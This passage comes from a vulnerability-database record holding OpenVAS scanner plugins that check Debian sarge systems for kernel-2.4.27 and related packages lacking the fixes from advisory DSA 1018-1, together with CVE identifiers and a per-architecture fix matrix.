ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r4k-kn04\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r3k-kn02\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-powerpc-small\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-powerpc-small\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-powerpc-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-powerpc-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-s390x\", ver:\"2.4.27-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-s390\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-s390\", ver:\"2.4.27-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-s390x\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-s390\", ver:\"2.4.27-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-s390-tape\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc32\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc32-smp\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc64\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc64-smp\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc32\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc32-smp\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc64\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc64-smp\", ver:\"42sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc32-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc32\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc64-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc32\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc64\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc64\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc64-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc32-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1058", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3858", "CVE-2004-0887", "CVE-2005-4618", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-1761", "CVE-2005-2709", "CVE-2005-2973", "CVE-2004-2607", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-2555"], "description": "The remote host is missing an update to kernel-source-2.4.27\nannounced via advisory DSA 1018-1. For details on the issues\naddressed with this update, please visit the referenced\nsecurity advisories.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56471", "href": "http://plugins.openvas.org/nasl.php?oid=56471", "type": "openvas", "title": "Debian Security Advisory DSA 1018-1 (kernel-source-2.4.27)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1018_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1018-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following matrix explains which kernel version for which architecture\nfix the problems addressed with this update:\n\nDebian 3.1 (sarge)\nSource 2.4.27-10sarge2\nAlpha architecture 2.4.27-10sarge2\nARM architecture 2.4.27-2sarge2\nIntel IA-32 architecture 2.4.27-10sarge2\nIntel IA-64 architecture 2.4.27-10sarge2\nMotorola 680x0 architecture 2.4.27-3sarge2\nBig endian MIPS architecture 2.4.27-10.sarge1.040815-2\nLittle endian MIPS architecture 2.4.27-10.sarge1.040815-2\nPowerPC architecture 2.4.27-10sarge2\nIBM S/390 architecture 2.4.27-2sarge2\nSun Sparc architecture 2.4.27-9sarge2\n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\nDebian 3.1 (sarge)\nkernel-latest-2.4-alpha 101sarge1\nkernel-latest-2.4-i386 101sarge1\nkernel-latest-2.4-s390 2.4.27-1sarge1\nkernel-latest-2.4-sparc 42sarge1\nkernel-latest-powerpc 102sarge1\nfai-kernels 1.9.1sarge1\ni2c 1:2.9.1-1sarge1\nkernel-image-speakup-i386 2.4.27-1.1sasrge1\nlm-sensors 1:2.9.1-1sarge3\nmindi-kernel 2.4.27-2sarge1\npcmcia-modules-2.4.27-i386 3.2.5+2sarge1\nsystemimager 3.2.3-6sarge1\n\nWe recommend that you upgrade your kernel package immediately and reboot\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.4.27\nannounced via advisory DSA 1018-1. For details on the issues\naddressed with this update, please visit the referenced\nsecurity advisories.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201018-1\";\n\nif(description)\n{\n script_id(56471);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0887\", \"CVE-2004-1058\", \"CVE-2004-2607\", \"CVE-2005-0449\", \"CVE-2005-1761\", \"CVE-2005-2457\", \"CVE-2005-2555\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3257\", \"CVE-2005-3783\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4618\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1018-1 (kernel-source-2.4.27)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-debian-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-source\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.27-speakup\", ver:\"2.4.27-1.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-boot-ia64-standard\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-boot-i386-standard\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-source\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-tree-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-common\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-doc\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4-i2c\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-server\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-client\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-server-flamethrowerd\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4-lm-sensors\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-generic\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-generic\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-generic\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-generic\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-3\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-riscpc\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-riscstation\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-netwinder\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-lart\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-bast\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-speakup\", ver:\"2.4.27-1.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-686\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-k6\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-k6\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-586tsc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-k7\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-386\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-k7-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-586tsc\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-386\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-686-smp\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-586tsc\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-686-smp\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-386\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-586tsc\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-k7\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-686\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-386\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-586tsc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mindi-kernel\", ver:\"2.4.27-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-386\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-386\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-k7-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-586tsc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-k7-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-686\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-k6\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-586tsc\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-686\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-586tsc\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-k6\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsensors-dev\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-k6\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-k7-smp\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-k6\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-586tsc\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-686-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-686\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sensord\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-k6\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-686-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-speakup\", ver:\"2.4.27-1.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-686-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-k7\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-k6\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-k6\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-686\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-686-smp\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-k7-smp\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-k7\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-k7\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-k7-smp\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-k7\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsensors3\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-mckinley-smp\", 